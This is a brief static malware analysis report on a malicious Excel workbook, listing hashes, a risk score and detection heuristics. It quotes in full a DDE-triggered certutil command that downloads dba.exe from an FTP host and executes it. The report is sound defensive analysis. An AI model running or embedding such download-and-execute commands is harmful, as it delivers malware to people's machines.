Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 35c4733f506a4cae…

MALICIOUS

Office (OOXML)

335.2 KB Created: 2020-12-24 11:15:18 UTC Authoring application: Microsoft Excel 14.0300 First seen: 2020-12-28
MD5: dfa88bf42c2e76db2ded145ddd9b564a SHA-1: c6bf729f11432ad23409e92879ef91dced7c7a67 SHA-256: 35c4733f506a4caeb53aab8d7056e9b3d8c973a4b4805e857d7f2a7669c4481f
120 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution

The critical heuristic 'OOXML_SPREADSHEET_DDE_MALICIOUS' indicates a DDE link is present in the Excel file, specifically executing 'cmd /c certutil -urlcache -split -f ftp://qazwsx@240520.ddns.net/dba.exe %APPDATA%\dba.exe & start %APPDATA%\dba.exe'. This command downloads 'dba.exe' from the specified FTP URL and then executes it. The ClamAV detection further confirms the malicious nature of the file.

Heuristics 2

  • ClamAV: Xml.Exploit.DDE_Abuse-9987933-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xml.Exploit.DDE_Abuse-9987933-1
  • Spreadsheet DDE link launches a dangerous command critical OOXML_SPREADSHEET_DDE_MALICIOUS
    Excel workbook contains an externalLinks/ddeLink entry whose ddeService/ddeTopic launches a dangerous executable. This is SpreadsheetML DDE command execution, distinct from WordprocessingML DDE field instructions.

Open this report in the interactive analyzer, or submit your own file for analysis.